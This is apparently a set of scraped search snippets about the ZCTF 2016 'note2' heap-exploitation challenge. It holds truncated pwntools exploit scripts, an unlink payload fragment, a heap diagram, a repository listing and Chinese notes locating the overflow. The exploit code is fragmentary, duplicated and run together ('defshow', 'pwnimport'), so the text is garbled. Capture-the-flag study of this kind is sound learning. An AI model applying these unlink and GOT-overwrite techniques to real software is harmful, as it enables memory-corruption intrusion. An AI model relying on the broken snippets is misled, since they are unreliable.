io.recvuntil('Input the length of the note content:(less than 128)') io.sendline(str(size)) io.recvuntil('Input the note content:') io.sendline(content)defshow(num): io.recvuntil('option--->>') io.sendline('2') io.recvuntil('Input the id of the note:') io.sendline(str(num)) ...
io.recvuntil('Input the length of the note content:(less than 128)') io.sendline(str(size)) io.recvuntil('Input the note content:') io.sendline(content)defshow(num): io.recvuntil('option--->>') io.sendline('2') io.recvuntil('Input the id of the note:') io.sendline(str(num)) ...
#!/usr/bin/python3from pwnimport*p=process("./note2")elf=ELF("./note2")libc=ELF("./libc.so.6")context.log_level="debug"strlen_plt=elf.plt[b"strlen"]strlen_got=elf.got[b"strlen"]defnew(content,length:int):p.recvuntil(b'option--->>')p.sendline(b"1")p.recvuntil(b"Input the...
from pwn import * p = process('./note2') note2 = ELF('./note2') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') context.log_level = 'debug' def newnote(length, content): p.recvuntil('option--->>') p.sendline('1') p.recvuntil('(less than 128)') p.sendline(str(length...
https://lantern.cool/wp-item-ZCTF-2016-note2/ ZCTF-2016-note2 wpLantern-r added Gitalk f0dfd547e2c34f9df97fa6590a111d9b labels Aug 10, 2020 Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment ...
ZCTF2016_note2 exp.py note2 note2.i64 asis2016_b00ks bctf2016_bcloud bctf2018_baby_arena ciscn2017_NotFormat ciscn2018_semifinal_pwn2 ciscn2018_semifinal_pwn3 cmcc_pwnme1 cmcc_pwnme2 cmcc_pwnme3 cmcc_simplerop hgame2018_flag_server hitb2017_1000levels hitb2018_gundam hitconTraining_bamboobo...
deletenote(1) content = 'a' * 16 + p64(0xa0) + p64(0x90) newnote(0, content) # delete note 2 to trigger the unlink # after unlink, ptr[0] = ptr - 0x18 deletenote(2) 执行之后 +---+high addr|...|+---+|'\x00'+'b'*7|ptr[2]--->+---+chunk2|size=0x90|+---+...
下面是4个主要功能,添加 note,size 限制为 0x80,size 会被记录,note 指针会被记录。 NewNote 溢出点代码 View Code 展示note 内容。 ShowNote 编辑note 内容,其中包括覆盖已有的 note,在已有的 note 后面添加内容。 EditNote 释放note。 DeleteNote
代码量挺大的,逆起来有难度 功能挺全,啥都有 main函数 add函数,有heaparray并且无pie保护,考虑unlink show函数,可以泄漏地址用 edit函数,有两种edit方式 delete,找不到UAF洞 看了好久,都没找到漏洞,我是five,后来看到了师傅的博客,发现了漏洞点 在a